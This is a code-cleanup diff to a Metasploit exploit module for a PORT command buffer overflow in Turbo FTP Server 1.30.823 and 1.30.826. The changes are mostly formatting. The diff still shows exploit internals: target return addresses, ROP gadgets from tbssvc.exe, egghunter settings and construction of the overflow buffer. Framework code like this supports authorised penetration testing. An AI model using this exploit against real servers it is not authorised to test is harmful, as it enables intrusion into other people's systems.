Code cleanup

Author: sinn3r

modules/exploits/windows/ftp/turboftp_port.rb

@@ -1,7 +1,3 @@
-##
-#
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -24,49 +20,45 @@ def initialize(info = {})
 				This module exploits the buffer overflow found in the PORT
 				command in Turbo FTP Server 1.30.823 & 1.30.826.
 			},
-			'Author'         => 	[
-						'Zhao Liang',	 #Initial Descovery
-						'Lincoln',	 #Metasploit
-						'corelanc0d3r',	 #Metasploit
-						'thelightcosine',#Metasploit
-						],
+			'Author'         =>
+				[
+					'Zhao Liang',    #Initial Descovery
+					'Lincoln',       #Metasploit
+					'corelanc0d3r',  #Metasploit
+					'thelightcosine' #Metasploit
+				],
 			'License'        => MSF_LICENSE,
-			'Version'        => '$',
 			'Platform'       => [ 'win' ],
 			'References'     =>
 				[
-					[ 'OSVDB', '85887' ],
+					[ 'OSVDB', '85887' ]
 				],
-			'Payload'	=>
-					{
-						'BadChars'        => "\x00",
-						'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
-						'EncoderOptions' =>
-							{
-								'BufferRegister' => 'EDI',
-							}
-
+			'Payload'        =>
+				{
+					'BadChars'       => "\x00",
+					'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
+					'EncoderOptions' => { 'BufferRegister' => 'EDI' }
 					},
-			'Targets'	=>
+			'Targets'        =>
 				[
 					[ 'Automatic', {} ],
 					['Windows Universal TurboFtp 1.30.823',
 						{
-							'Ret'		=> 0x00411985,	# RETN (ROP NOP) [tbssvc.exe]
-							'ver'		=> 823
+							'Ret' => 0x00411985, # RETN (ROP NOP) [tbssvc.exe]
+							'ver' => 823
 						},
 
 					],
 					[ 'Windows Universal TurboFtp 1.30.826',
 						{
-							'Ret'		=> 0x004fb207,	# RETN (ROP NOP) [tbssvc.exe]
-							'ver'		=> 826
+							'Ret' => 0x004fb207, # RETN (ROP NOP) [tbssvc.exe]
+							'ver' => 826
 						},
 					],
 				],
 
 			'DisclosureDate' => 'Oct 03 2012',
-			'DefaultTarget' => 1))
+			'DefaultTarget'  => 0))
 	end
 
 	def check
@@ -82,7 +74,6 @@ def check
 
 
 	def create_rop_chain(ver)
-
 		# rop chain generated with mona.py - www.corelan.be
 		if ver == 823
 			rop_gadgets =
@@ -93,7 +84,7 @@ def create_rop_chain(ver)
 				0x00423b95,	# XCHG EDX,EDI # RETN [tbssvc.exe]
 				0x00423a27,	# XCHG ESI,EDI # RETN [tbssvc.exe]
 				0x005d1c99,	# POP EBP # RETN [tbssvc.exe]
-				0x004cad5d ,	# & jmp esp [tbssvc.exe]
+				0x004cad5d,	# & jmp esp [tbssvc.exe]
 				0x004ab16b,	# POP EBX # RETN [tbssvc.exe]
 				0x00000001,	# 0x00000001-> ebx
 				0x005ef7f6,	# POP EDX # RETN [tbssvc.exe]
@@ -135,7 +126,6 @@ def create_rop_chain(ver)
 	end
 
 	def exploit
-
 		my_target = target
 		if my_target.name == 'Automatic'
 			print_status("Automatically detecting the target")
@@ -162,11 +152,12 @@ def exploit
 
 		eggoptions =
 			{
-			:checksum => true,
-			:eggtag => 'w00t',
-			:depmethod => 'virtualalloc',
-			:depreg => 'esi'
+				:checksum => true,
+				:eggtag => 'w00t',
+				:depmethod => 'virtualalloc',
+				:depreg => 'esi'
 			}
+
 		badchars = "\x00"
 		hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
 
@@ -182,7 +173,7 @@ def exploit
 
 		buf1 = rand_text_alpha(2012)
 		buf1 << egg
-		buf1 <<	rand_text_alpha(100)
+		buf1 << rand_text_alpha(100)
 
 		buf2 = rand_text_alpha(4).unpack('C*').join(',')
 		buf2 << ","